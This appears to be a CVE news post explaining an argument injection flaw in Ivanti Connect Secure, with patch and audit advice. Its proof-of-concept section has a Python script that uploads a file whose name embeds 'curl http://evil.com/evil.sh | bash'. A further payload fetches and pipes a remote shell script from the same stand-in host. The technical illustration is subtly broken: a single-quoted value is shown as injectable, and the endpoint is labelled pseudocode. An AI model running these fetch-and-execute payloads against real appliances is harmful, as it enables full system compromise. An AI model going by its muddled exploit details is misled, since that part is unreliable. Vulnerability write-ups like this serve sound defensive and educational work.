CVE CyberSecurity Database News

CVE-2024-11633 - Argument Injection Vulnerability in Ivanti Connect Secure (Pre-22.7R2.4) Allows Remote Code Execution for Remote Admins

Poster -

In early 2024, security researchers discovered and reported a new critical vulnerability affecting Ivanti Connect Secure products (formerly Pulse Connect Secure), tracked as CVE-2024-11633. This vulnerability—an “argument injection” bug—lets any authenticated administrator run system commands on vulnerable deployments, leading to full remote code execution (RCE). If you are running Ivanti Connect Secure before 22.7R2.4, your device may be at risk.

In this article, we’ll break down what CVE-2024-11633 is, how it can be exploited, and steps to stay safe. We’ll show a code snippet highlighting the core issue, and provide reference links for further reading.

What is Argument Injection?

Argument injection happens when an application passes unsanitized input as part of a command-line argument, allowing attackers to break out of their expected parameter and add new malicious commands. This is especially critical in security appliances, because it often leads directly to shell access.

Access Condition: Authenticated as admin (remote or local network)

- Impact: Remote code execution as root/system

How Does It Work?

The web admin interface of Ivanti Connect Secure lets administrators upload configurations or scripts via the web panel. If an attacker places special characters (;, &&, |, etc.) within a field passed to a backend shell command without proper sanitization or quoting, the attacker-supplied value can influence the command in unexpected ways.

An attacker with admin access can supply crafted input, such that when the backend executes a command like:

os.system("restore-config --file '{}'".format(user_input))

If user_input is

mybackup.cfg; whoami

The actual command becomes

restore-config --file 'mybackup.cfg; whoami'

Depending on parsing and quoting, this might cause the system to run whoami (or any command the attacker chooses).

Proof-of-Concept: Exploit Code

Suppose an attacker has admin credentials (or has obtained them via phishing, weak password, or prior compromise). They can exploit the argument injection like this:

Step 1: Login to the web admin interface.

Step 2: Use the configuration restore/upload feature, or any other section where a file or argument is passed to the backend.

Step 3: Inject a command in the filename or other vulnerable parameter.

Here’s a pseudocode snippet illustrating the attack

import requests

ips = "https://vpn.vulnerable-ivanti.com";
sess = requests.Session()
sess.verify = False

# Authenticate as admin (use real creds)
payload = {
    "username": "admin",
    "password": "pa$$word123"
}
sess.post(ips + "/dana-na/auth/url_admin/login.cgi", data=payload)

# Prepare malicious filename
# Here: restore-config is the vulnerable endpoint
mal_filename = "backup.cfg; curl http://evil.com/evil.sh | bash; #"

files = {
    "file": (mal_filename, open("backup.cfg", "rb"))
}

r = sess.post(ips + "/dana-na/admin/restore-config.cgi", files=files)

# If the backend runs the filename naively, 'curl http://evil.com/evil.sh | bash' will be executed!

Result: The attacker’s command runs as SYSTEM/root on the appliance.

Why Is This So Dangerous?

- Privilege Level: The exploit is available to *any administrator*, including those with credentials obtained via prior phishing or brute force.
- Scope: Allows full system compromise, persistent backdoors, lateral movement, credential theft, VPN hijacking.

Submit an RCE payload in the filename or input field, such as:

evil.cfg; wget http://evil.com/rev.sh | sh

Patch Status

Ivanti released version 22.7R2.4 fixing this.
If you run an older version, update immediately.

Details from Ivanti security advisory

- Ivanti Security Advisory for CVE-2024-11633
- CVE-2024-11633 @ NIST NVD
- Official Release Notes

Conclusion

CVE-2024-11633 shows that even security products can be highly vulnerable if user-supplied input isn’t sanitized, especially when passed to backend system commands. Argument injection is a straightforward but devastating bug that often leads to total compromise.

Recommendation:
If you manage Ivanti Connect Secure, patch *immediately*, audit your admin accounts, and review for signs of compromise.

Further Reading

- Original Ivanti Advisory
- NIST CVE-2024-11633 Details
- Connect Secure Version History

Timeline

Published on: 12/10/2024 19:15:19 UTC
Last modified on: 01/17/2025 19:35:05 UTC